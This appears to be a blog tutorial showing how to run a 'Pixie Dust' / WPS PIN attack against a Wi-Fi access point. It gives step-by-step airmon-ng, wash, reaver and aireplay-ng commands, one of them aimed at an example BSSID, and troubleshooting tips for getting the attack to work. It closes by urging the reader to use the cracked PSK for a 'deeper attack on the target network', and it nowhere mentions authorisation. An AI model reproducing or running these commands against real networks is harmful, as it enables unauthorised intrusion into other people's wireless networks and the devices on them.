Pixie Dust Attack
Let’s start!
Enable wireless card monitor mode -
Assuming you have a capable card, let’s switch it from
managed to monitor mode. Kill all processes that can interrupt monitor mode:
# airmon-ng check kill
Enable monitor mode:
# airmon-ng start wlan0
If you don’t know which interface your wireless card is,
issue the command iwconfig or ifconfig or ip addr show.
Wireless interfaces are
marked IEEE 802.11bgn. Your wireless card would probably be named wlan0 or
something similar.
Airmon will create a new interface called wlan0mon, which is
your wlan0 but in monitor mode.
We will use wash command to find a WPS vulnerable access
point.
# wash -i wlan0mon
If you encoutner [!] Found packet with bad FCS, skipping...
error, try:
# wash -i wlan0mon --ignore-fcs
Wash will then show APs with WPS enabled. Now if you see a
WPS Locked with No value, that means the AP is WPS vulnerable.
Select your target AP and take note of its BSSID and
Channel.
Launch the attack -
Now that we have the valuable data of our target AP, we can
proceed on launching the attack:
reaver -i wlan0mon -b <BSSID> -c
<channel> -a -vv
# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv
where -a tells reaver to automatically adjust base on the
target’s behaviour and -vv is for verbosity.
Check reaver --help for more
options.
Some wireless cards, like the Alfa AWUS036NH I used,
encounter an association error. You can fix this by opening another terminal
and do the association with:
# aireplay-ng -1 0 -a <BSSID> <interface>
Then modify your reaver command by adding -A argument,
meaning that the association is done in a separate process:
# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv -A
Another thing to look out for is when you get M5 right away
and get a timeout error when sending the M6 message.
It might be that the target
AP indeed has WPS enbled but is not configured.
Don’t waste your time on this
AP, I’ve tried it and reaver will never get the PIN.
If you’re receiving NACK messages, it means AP is responding
to WPS requests as expected.
It will take around 10 hours or even days depending on the
signal strength for reaver to crack the PIN.
The good thing is you can pause
reaver (Ctrl+C) and resume the attack in another time. You can leave Reaver
running during the night if you wish.
Once Reaver has cracked the PIN, it will show the PSK of the
AP. You can now connect to it and perform a deeper attack on the target
network.
Have a safe hack.
You may want to see my other tutorials -
No comments:
Post a comment